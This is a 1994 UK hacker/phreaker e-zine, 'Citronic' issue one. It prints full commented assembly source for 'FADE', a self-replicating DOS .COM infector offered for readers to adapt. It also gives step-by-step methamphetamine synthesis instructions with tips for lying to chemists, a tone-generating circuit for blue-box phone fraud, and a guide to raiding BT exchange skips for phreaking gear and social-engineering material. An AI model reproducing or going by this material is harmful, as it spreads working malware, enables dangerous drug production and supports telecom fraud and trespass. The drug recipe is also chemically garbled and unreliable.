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Citronic Volume 1, new UK h/p mag

NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.

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August '94


Number One

Citronic Journal is a 'Cyberspace' Free Zone
Citronic are Equal Opportunities Employers

?i?r0?i? - Citronic - ?i?r0?i? - Citronic - ?i?r0?i? - Citronic - ?i?r0?i?

----> |-|ar|)c0r3 T3cH|\|0pHi11iAcZ <----

| |
| 1) This bit |
| 2) DisKlaimer |
| 3) Messages from Dah Krew |
| 4) Getting Nicked ! |
| 5) DAC Plans |
| 6) A Simple DOS Virus |
| 7) Speed/Whiz Recipe |
| 8) Maelstrom/Terminal Boredom Bust |
| 9) Joining Citronic |
| 10) Trashing BT
| 11) Dah Last Bit |
| |

"If in doubt - Shoot a Fascist"

?i?r0?i? - Citronic - ?i?r0?i? - Citronic - ?i?r0?i? - Citronic - ?i?r0?i?

[email protected] [email protected] [email protected]

If anyone does any of the stuff mentioned in this file there is
a possibility of getting busted and being put in jail forever. If this
happens don't come whining to us 'cos we'll deny everything and act real
innocent. Also any wars in small third world states are nothing to do
with us. Everything in here is for informational purposes only and
anything carried out is entirely at your own risk.

M3sS4g3z Fr0m |)ah |<r3W
First of all Citronic iz:

HarLeQuin - Dah G0DfaTher
Pr0d1gy - Dah T0P DaWg
Grim Reefer - Dah N0vEl NeT SurFeR
Pulse - Dah UnDerGr0uNd hItMaN
Nosfaretu - Dah MiDniGhT f0x
SparHawk - Dah DaTa sTAti0n

Honourary Memberz:
Smidge - K0dEr Fr0m HeLL AnD VirUs d00d
Bill Clinton - Group drug runner, Eunuch's Consultant & Chief Sax Player

HarLeQuin sayz:
Right, I guess you're thinking, 'Oh another h/p group that's
gonna be around for a couple o' months before disappearing in a flurry
of vitriolic slagging and allegations'. Well you're probably right. But
dah thing is...


We're having a laff and apart from getting in a bit of serious
debauchery and technology abuse we're here to have FUN and to give 'em
something to type about on IRC. So to start dah ball rolling...
Harlequin is a narq and he shags various small mammals. I have faked
ASCEE docs to prove it. I'll even go on IRC and say 'Hey Harl got me and
my 4,000 strong h/p group busted last week just so he could get off
loading dah dishwasher' and everyone will go 'Yeah ?!?!?!? Well I better
slag him off so I dont look lame in front of all dah 3l33t haqrz 0n
|-|3r3' and then when I suck up enough to dah plus oh posse & eYe g3t
0pz I'll ban him just to show what an 3l33t |-|aQr eYe Am !! Itz all
true ! I swear ! I read it in dah /etc/true_things dir on

Anyway, being mostly pissed off with the shit that gets thrown
around I dont really give a f**k what ppl say about me 'cos 99.99% of it
isn't true. So if you want to let everyone know I'm a lamer/sheep
shagger/narq/warez d00d feel free ! You're wasting yah ASCEE keystrokes,
save it for someone who gives half a toss.

On a more light hearted note - hope ya enjoy the rest of the text...

And Big |-|ellos to the Following :
All of Contour >Cos they kick ass<
Meeko >Midnight BT Engineer<
Mini-master >Pascal wiz :-)))))) <
BadS >London phone dewd and Phreqbot sysop<
Maelstrom >Not only a 3l33t haq/phreak but a bloody good bloke<
Phantasm >Sysop of UA BBS - kEwl !!!<
THC >We WILL meet sometime<
Aristotle >hArDc0rE virus d00d!<
Grim Reefer >It was a pleasure to pass out in your house!<

Getting Nicked
or what to do when you're arrested...

Did you know over 70% of all convictions are made on the basis of what
was said in the interview. What does this mean practically ??


Yep that's it. I know this is going to be mind-blastingly hard,
especially for Phreaks who have an innate ability to talk constantly.
But hopefully the lack of a telephone in the vicinity may keep you
quiet. You simply answer 'No Comment' to *ANY* interview questions
asked. Also the Police may start chatting to you informally when you're
in the police car/holding cell/police custody cell/anywhere else. Don't
give them any information that can help them. This means basically
shutting up and answering only stuff such as you're name, address and
other such formalities. They can't use this idle chat as evidence
against you, but if they think you're innocent then they're gonna stop
looking for evidence but if you say 'Yeah I did it copper and you can't
prove nuthin' 'cos this aint recorded ha ha ha !' the're gonna keep
looking until they find something.

Answering 'No Comment' as a reply to an interview question is
not an admission of guilt. If you're case goes to trial the interview
tape will be played, and if you answer 'No Comment' to a question it's
as if the question had not been asked. The prosecution cannot base
anything on the fact you did not wish to answer the question. Another
ploy the police will use is the bribery tactic... i.e. 'We have you're
mates and they all said you did it - so unless you tell us something
you're going down forever' - again no comment, this is a ploy just to
get you to talk. Ratting on yer mates because they're gonna let you off
easier is not only likely to get you lynched as soon as you walk out the
door, but it also won't work, so don't try it. Also they will try and
outrage you into defending yourself i.e. 'You have broken into
Government computers and have defrauded more then 50,000 quids worth of
stuff haven't you ??'. This is another ploy to make you go 'No way I
haven't done anything like that!' - bite your tongue, they will simply
try to get you talking.

Being in a police cell is a completely miserable experience and
being told 'If you tell us something you can be on the next bus outta
here' is an extremely attractive prospect after being locked up in a 6x4
room for 8 hours. But all these are all cunning psychological tricks
used to get convictions (after all this is what they're paid for).

And finally... You have been bright enough to PGP encrypt all
your sensitive info with a 1024 bit key and a bloody long password
haven't you ??? And you have completely shredded all unwanted dodgy
stuff haven't you ?? (Yeah, not just deleted - electronically SHREDDED).
It might be worth mentioning that if you're HD is compressed with
Stacker or any other compression utility then its almost impossible to
completly erase deleted files by writing over them....

This advice is not just stuff from the top of my head. It's from
experience - bitter experience. The bright thing to do is not to get
nicked in the first place either by:-

a) Not breaking the law
b) Having half a brain and not getting caught

Freedom and Good Karma '94



Plans for a
Digital -> Audio Convertor

Some of you poorer phreaks may have noticed blue boxing is
pretty impossible without a soundcard for your beloved PC or without
being able to solder a circuit without burning your ear with the
soldering iron. Anyway, this is a very simple circuit that produces
perfect tones. Although it isn't new or cutting edge, its been included
in Citronic for convenience sake, as when I was looking for it (quite
some time ago) I couldn't find the circuit diagram anywhere. This will
cost you a couple of quid/few dollars so is very cheap. When its built,
attach it to your parallel port. Please note: the output has to be
attached to an amplifier. My CD player works perfectly for this, most
stereos will do.

This circuit requires:
9 x 20K resistors
9 x 10K resistors
1 x 100 MFD capacitor
25 pin DShell plug

All the resitors are 1/4 watt and 1% tolerance. Make sure these
are exact as the first DAC I built had 5% tolerance resistors and was
crap. You might also want to add a female RCA plug to have a convenient
way to connect it to an amplifier. The entire circuit can be built on
the back of the 25 pin plug. Be sure to connect the two points labeled
0v. No power supply is required. This circuit was included in an Amiga
mod file player package by Mark J. Cox. He acknowledges Harry Stox for
the circuit.

Printer Port:

signal pin 20k 20k
D0 2 >??????????????0v
20k ? 10k
D1 3 >????????
20k ? 10k
D2 4 >????????
20k ? 10k
D3 5 >????????
20k ? 10k
D4 6 >????????
20k ? 10k
D5 7 >????????
20k ? 10k
D6 8 >????????
20k ? 10k
D7 9 >????????
20k ? 10k 100 MFD
?????????????> TO AMPLIFIER
? 10k
GND 20 >????????????????????>

Almost my entire phreaking career was using this device so it
does work ! I recommend BlueDial software, its free and supports DACs.
The current version at the time of writing is BDial v 6.1 Also there is
alot of software around that lets you play/edit Amiga .MOD filez thru a
DAC (just in case you're interested)


The Fade Virus
A Simple Dos Virus

Viruses are usually ignored by hackers as 'novelties' or 'toys'
but in fact they can be extremely useful. Especially when attacking DOS
based network systems such as Novel.
They are also an excellent way to learn assembly language (for
any platform) as you can go from very simple viruses to extremely
complicated ones that require a working knowledge of the platform,
whether documented or not.
They are also an artform, check out some of NuKE's/Phalcon
Skism's work for some excellent examples.
Any common criminal with a copy of FORMAT can cause damage. Get
creative - destructive viruses get a lame rating of 99. 8% Finally, if
you want to get into this virus thing, check out #virus on IRC or
Aristotle's BBS, Black Axis on (804) 599-4152. 40HEX magazine (by
Skism/Phalcon) and NuKE Info Journals are a mine of information, if you
can get hold of them.
Anyway, I have included a totally original, very simple virus I
wrote some time ago. I made it as simple as possible so it's easy to
learn from and adapt. It's easily modified and very easy to understand.
So have a play around with it and see what you can come up with.

* *
* Flowchart for the FADE Mk I virus *
* *

[get length of host from ]
[jmp at beginning of file]
[ and PUSH to stack ]
[find first *.COM file]-->----file not found--------------+
| |
file|found |
| |
[open file]<------------file found--------------+ |
| | |
[read 5 bytes to read_buf] | |
| | |
[check bytes for virus tag]->---tag found-----+ | |
| | | |
| [close file] | |
| | | |
| [find next *.COM]->+ |
| | |
| [file not|found] |
| | |
|<-------------------[set non_found_switch]<---+
[move 5 original host_bytes ]
[back to begining of program]
[move read_buf to host_bytes]
[non_found_switch present ?]->--yes-------+
| |
n|o |
| |
[get file length from DTA] |
[ and put into jmp_inst ] |
| |
[write tag+jmp_inst to] |
[ begining of file ] |
| |
[write rest of virus] |
[ to end of file ] |
| |
[close file]<---------------------+
[execute host program]

-----CUT HERE-----
;* *
;* The [FADE] Virus Mk Ia *
;* A Simple 179 byte parasitic .COM infector *
;* by *
;* HarLeQuin *
;* *

; 179 bytes long
; Parasitic Non-Resident .COM infector
; Compiled with A86

; Offsets to data, negative from end of host
sp_off EQU 16 ; file spec '*.COM',0 offset
inf_off EQU 10 ; infect tag offset
jmp_off EQU 8 ; jmp instruction offset
host_off EQU 5 ; host bytes offset
vir_length EQU 194-15 ; Length of active virus code

db 90h,0F8h ; nop,clc - virus infection tag
jmp start

;--------------------------- Original Program ----------------------------

db 90h,90h,90h,90h,90h,90h,90h,90h,0CDh,20h

;--------------------------- Original Program ----------------------------

mov ax,[103h] ; Put jmp length into ax
add ax,105h ; plus offset of ORG and tag+jmp
mov cl,8 ; 8 Loops
push_labl: ; Rather than POP then PUSH every time
push ax ; Put OFFSET start on stack
loop push_labl ; Do it again

mov ah,4Eh ; Find first file
xor cx,cx ; with any attributes
pop dx ; get start address
add dx,vir_length-sp_off ; that matches *.COM
int 21h ; Dispatch
jc non_found_switch ; If none found execute host program

mov ax,3D02h ; Open file using handle, read/write privs
mov dx,9Eh ; address of filename in DTA
int 21h ; Dispatch
mov bx,ax ; Put file handle in bx

mov ah,3Fh ; Read from file
mov cl,05 ; 5 bytes
pop dx ; get start address
push dx ; put into stack again
add dx,vir_length ; into read_buf
int 21h ; Dispatch

mov si,dx ; si=OFFSET read_buf
cmp word [si],0F890h ; are the 1st 2 bytes of the tag present ?
jne infect ; if not infect file

mov ah,3Eh ; Close file
int 21h ; Dispatch

mov ah,4Fh ; find next matching file
int 21h ; Dispatch
jnc open_file ; If found, then open it

mov [0FADEh],0FADEh ; Set no other files to infect 'switch'


mov cl,05 ; move 5 bytes
pop si ; get 'start' address
add si,vir_length-host_off ; from host_buf
mov di,100h ; to 100h
lods byte ; load byte from si (host_bytes)
stos byte ; put into di (100h, start of .COM)
loop loop_labl ; loop it

mov cl,05 ; move 5 bytes
pop si ; get 'start' address
add si,vir_length ; from read_buf
pop di ; get 'start' address
add di,vir_length-host_off ; to host_bytes
lods byte ; Load from si (read_buf) byte in ax
stos byte ; Put ax into di (host_bytes)
loop anloop_labl ; loop it
cmp [0FADEh],0FADEh ; Has the no files 'switch' been set ?
je then_close ; If so, execute host program

mov ax,[9Ah] ; Put file length (from DTA) into ax
sub ax,05 ; minus length of tag+jmp
pop si ; Get 'start' address
mov [si+vir_length-jmp_off+1],ax ; put file-length into jmp_inst

mov ax,4200h ; Move file pointer to beginning of file
xor cx,cx ; 0 bytes
xor dx,dx ; 0 bytes
int 21h ; Dispatch
mov ah,40h ; Write to file
mov cl,05 ; 5 bytes
pop dx ; get start address
add dx,vir_length-inf_off ; from infect_tag
int 21h ; Dispatch

mov ax,4202h ; Move file pointer to end of file
xor cx,cx ; 0 bytes
xor dx,dx ; 0 bytes
int 21h ; Dispatch
mov ah,40h ; Write to file
mov cl,vir_length ; length of virus
pop dx ; from start
int 21h ; Dispatch

mov ah,3Eh ; Close file
int 21h ; Dispatch

push 100h ; Put 100h on stack
ret ; 'return' to 100h

spec db "*.COM",0 ; COM file mask
infect_tag db 90h,0F8h ; Infection tag
jmp_inst db 0E9h,00h,00h ; jmp instruction to jump to virus code
host_bytes db 5 dup (90h) ; 5 original bytes of host program

-----CUT HERE-----

UUEncode Copy of FADE-IA.COM

-----Cut here-----
section 1 of uuencode 5.15 of file fade-ia.com by R.E.M.

begin 644 fade-ia.com
sum -r/size 45485/304 section (from "begin" to "end")
sum -r/size 25209/194 entire input file

-----Cut here-----


Speed/Whiz Recipe
0K, many of you may have seen this or a similar recipe floating around,
well I thought I'd reprint it with a few of my own comments and hints.
This is not another one of those dodgy drugz files, this actually works
and I have succesfully made some. So I thought I'd pass on the benifit
of my experience :)

This is for informational purposes only, you use this information at
entirely your own risk. Speed fucks you up, and if you don't make it
right it can fuck you up without all the nice effects.

o 8 fluid ounces of Wood Alcohol Naphtha (It *HAS* to be wood alcohol
o Muratic Acid (Sodium Hydroxide)
o Acetone
o 1 bottle Vicks Nasal Spray (it *HAS* to be Vicks)

NAPHTHA - Can be obtained from a chemist (where I got it from) or from
Hays Group UK (tel 081 853 1172). If you're going to get it from a
chemist a good reason is for preserving butterflies (or other insects)
for display. Try to get an older person to buy some because chemists
*know* what it can be used for, in fact when I bought some the chemist
said 'be careful with this, did you know sailors used to make drugs out
of it ??'.

MURATIC ACID - This is driveway cleaner, go to a building site supplier
for this. The mixture should be at least 14% Muratic Acid content, it's
watered down with water. The driveway cleaner from places like B&Q has a
very low muratic acid content, this is no good. Tell them your in the
building trade, and you need the industrial stuff because you have loads
of moss, cement and all other goodies over the brick work of your house
you've just brought. Comes in 0.5 / 1.0 / 2.5 / 5.0 L containers. I said
something like 'I hired a driveway cleaning machine off a local plant
hire company (give a name) and they specified to use 14% Muratic Acid...'

ACETONE - get this from your chemist, it comes in small bottles, it can
be brought over the counter without any problems. It is a solvent, say
your using it to water down your oil paints, because your an artist or
something or say its for nail varnish remover (usually works best)

VICKS NASAL SPRAY - just say you've got a cold for this one. They can be
brought from most shops and all chemists. NOTE : IT MUST BE A VICK'S
ONE, other makes don't have the right chemicals in. You need 1 spray per

o 1 eye dropper, yet again, get this from your chemist.
o 3 clear glass jars, about the size of a medium/large coffee jar, must have
a screw lid on it, to stop nasty stuff going everywhere.
o A saucepan (preferably non-stick)
o A pair of plastic/rubber gloves

Instructions (follow these *EXACTLY*)

[1] Pour 8 fluid ounces of Naphtha into the coffee jar (making sure the
jar is cleaned out !)

[2] Cut open the Vicks inhaler with a sharp pair of cutters, remove the
cotton insert and throw away the plastic container. Place the cotton
insert in the jar with the Naphtha in it. (3).Put the lid on the jar
and shake it for around 4-5 mins. You've got to get the chemicals in
the Vicks to bond into the Naphtha. This is where the Methamphetamine
comes from.

[3] Once this is done, squeeze out all the juices from the Vicks cotton,
(make sure your wearing gloves, other wise you'll end up with your
hands stinging alot). Remove the cotton from the mixture.

[4] Next add 2 fluid ounces of hot water in to another jar, add 3 drops
of muratic acid into the mixture (use this amount if your muratic
content is between 12 & 18 %, otherwise change the amount that is
mixed with the hot water)

[5] Now add the first jar, the one with the Naphtha and Vicks in it to
the second jar, the one with hot water and the acid in it. Now shake
the jar for around 3 mins. Yet again you've got to get to chemicals
to bond

[6] After this is done, spin the jar so that the liquid goes around
inside it, note the bubbles that come off. Try to remember the rate
of which they come off.

[7] Now let the mixture settle, this should be left for about 10 mins.
You will see (should see) two layers in the jar. The stuff we're
after is the bottom layer. Use the eyedropper again, making sure
you've washed it out with hot water. DO NOT USE ANY CLEANING
into the mixture, and slowly draw off the bottom mixture, making sure
you don't get any of the top mixture into it, this will F**k it up !
Place the bottom layer straight into a non-stick pan, then take the
top layer save and place into a clean jar.

[8] Now heat up the mixture, using a very low heat. DO NOT USE A GAS
COOKER, as the chemicals you are using are flammable and you could do
yourself and kitchen alot of damage.

[9] As the mixture evaporates, you will see that it will leave a white
(semi clear) film behind it. Methamphetamine crystallises in straight
lines, look for these lines as it drys out. Scrape it off with
something sharp and clean. Keep it in the pan.

[10] Now add a small amount of acetone into the pad. Just enough to cover
the lowest heat possible, the acetone will evaporate.

[11] Once this is done, your left with your speed, scrape it out and off
you go !

[12] Next if you get the jar with the liquid you saved in step 7, and
then go back to step 5 and repeat the process. When you look at the
bubbles, did you remember to look at them?, you need to get more or
less the same about off them, if you don't, then throw the mixture
away as it has had all the good stuff taken out of it. Carry on
again and make some more !

o Make this outside or in a very well ventilated room, the fumes from
the chemical are flammable, can be nasty when inhaled and give you
thumping headaches.

o Making speed buggers up your pans, it took me ages to scrape yellow
gunk off them, I haven't tried with non-stick pans, but I would
imagine they work better.

o Cut the speed with powdered glucose, the stuff you buy in the street
is cut, and taking the same amount of home made stuff spins you out.

o I have included my excuses for getting the stuff off chemists to give
you an idea of what to do, try not to use the same ones here 'cos the
chemist is bound to say 'Hmmmmm, that's the fourth person in today for
Butterfly preservatives, so tell me more about your butterflies...'

o Charles and Karl from Spycom for the original recipe.
o Smidge for being the first to make some and for his testing :)


Maesltrom/Terminal Boredom Bust

Taken from Underground Access BBS
News Update: Thursday 04-Aug-94 19:08:00


I have been informed by Coaxial/PHATE that Maelstrom's "Terminal Boredom"
BBS has been raided. There has also been bust reports published in several
Scottish newspapers today, so expect more details soon.

xxxx-xxxxxx is not answering and I suggest people do not phone this
number until all the facts are known.

Phantasm (SysOp)

Yes it's started to happen. Over the years the UK h/p community
has got off lightly compared to our American and European counterparts.
American suffered the 1990 'Hacker Crackdown' while in Britain we have
had very little in the way of police attention except the occasional
bust and arrest.
Then suddenly in the space of a year, global boxing, which had
remained the same for the previous five years, goes down. Bulletin
boards get raided and people get arrested. A 20 year old man in Plymouth
was arrested for allegedly writing and spreading the SMEG viruses, which
is an almost impossible charge to convict some-one on. If the police
have decided that they want to nail people for writing viruses, then
hackers and phreaks had better watch their backs.
The Telcos and Corps have wised and decided that they're not
going to tolerate their systems being 'abused' any longer. All we want
to do is use hardware we can neither afford nor get legitimate access
to. What average hacker/phreak can afford to pay the rediculous prices
of commercial information systems (for such a dismal service) or get to
play on mainframes and UNIX nets. Virtually none.
Then when we try to advanced our knowledge we are told by the
same corporations and multi-nationals who fund the arms trade, exploit
third world poverty and slowly poison the planet that *we* are 'abusing
the system' are a threat to 'the fabric of society'.
I am not a revolutionary, but I just beleive that knowledge
cannot be owned, and as hard as the Corps and Governments try to hide
information from us, we have the moral if not legal right to find it.
Someone who was on Terminal Boredom sold the story to the police
and the papers. Whoever you are, you've destroyed one of the pitifully
few oasis's of free information left in the UK. I hope you are happy in
the knowledge that you have saved the world from more 'evil' hackers who
were busily menacing society. You are the pride of the great and the
good, the Goverments and the Corps.
Fuck you.


Joining Citronic

So, you wanna join the Citro Dewdz on their great 'lectronic
adventure huh ? Well, no problem. Ya just gotta be suitable, this
questionnaire might help :)

o Is your every other sentence on a BBS 'U R a LaMeR !!!' ?

o Do you spend your life trading codez and never getting them yourself ?

o Do you hear stuff off other h/p d00dz and pass it off as your own ?

o Do you crash BBS systemz to show how eleet you are ?

o Do you not bother finding stuff out for yourself ?

o Do you suck up to all the eleet d00dz on #phreak/#hack and live to get
opz ??

Yes to all of these ?? Well F*#@ 0FF ! We don't want wasters in here,
all you've got to be to join is, a good laff and some-one who wants to
learn. So if ya wanna join contact me (HarLeQuin) either thru:

Underground Access BBS
E-mail: [email protected]

...or catch me on #phreak or #hack

Version: 2.3



Trashing B.T.

"Its good to Phreak"

You would think that after so many years of Hackers and Phreaks
screwing them over, BT would at least get some idea about site security.
Well apparently not, your local BT exchange is *still* and excellent
site for free telephone goodies and useful info, all kindly discarded by
our beloved phone co.
Pr0d1gY decided to come and see me, so after a few hours of
messin' around with beige boxing we decided to have a look around the
local BT exchange. Its a reasonably big building, that's now almost
empty due to all the switching being done digitally. However, at night,
there are between 8 and 10 BT vehicles parked out the back aswell as a
large skip where everything is dumped. After half an hour of wading thru
their skip this is the list of stuff we took home:

1 x Old rotary dial phone.
10 x Phone Jack sockets of various types, including spike/surge shielded
20 Metres of new phone cable, their was so much of this that whenever
I need some more cable I just nip down and get some. There is
*loads* of it !
1 x Packet of Benson and Hedges Cigarettes (!)
2 x Installation manuals for cabling etc etc (including fibre optic
cables, testing of alarm systems and data transmission)

...and pages and pages of order sheets.... These are probably the most
useful of the things we found. On the sheet it details, the job the BT
engineer is/was doing, exactly what the engineer was fixing/doing, the
date of the job, order number of the item, order description, the
engineer's name, the engineer's code, the address of where the job is
being done, as well as other codes such as the zone code, part no.'s etc
etc etc. Prime bullshitting material, for either bullshitting BT or the
The cabling and hardware proved to be very useful for beige
boxing, and the B&H proved the be useful for... errrr, nothing really.
The BT exchange was completly deserted, and their were no
cameras of any sort about. Basically giving us as much time as we wanted
to look thru what they had left... One word of warning, if you're gonna
climb into a BT skip and you're gonna put your wallet into your top
pocket. Remember to do your pocket up ! 'Cos I didn't and it took us
bloody ages to find my wallet again.
I recommend checking out the site a few days before at approx.
the same time of day as your gonna have a wander round. Depending on the
size of the the exchange they may have security guards and/or cameras.
The exchange we did was purely that, an exchange only, it was not for
dealing with customers or anything else. In my experience BT buildings
that are used for purposes other than purely engineering/maintenance are
better guarded than your average exchange, so be careful...
If questionned at all think of a good excuse, as long as your
not knee deep in telephone cable and standing in a skip an excuse like
'I am looking for a lost cat' is usually sufficient, as long as you
clear off pretty soon, you can always come back later...
All my telephone supplies are now gained from BT free of charge,
so you'll never have to pay for anything again :)


Dah Last Bit

For the next issue we'd kinda like submissions on the following

Cellular Hacking/Phreaking
Interesting ways of Imbibing Dope
Things that go KaBoom!
Amusing Pranks/Gags
kEwL Koding trix
Errmmmm, anything really

You know what we're after, anything will be considered (and probably
published) so get tapping.

In case you are terminally stupid our e-mail address is once again...

[email protected] [email protected] [email protected]


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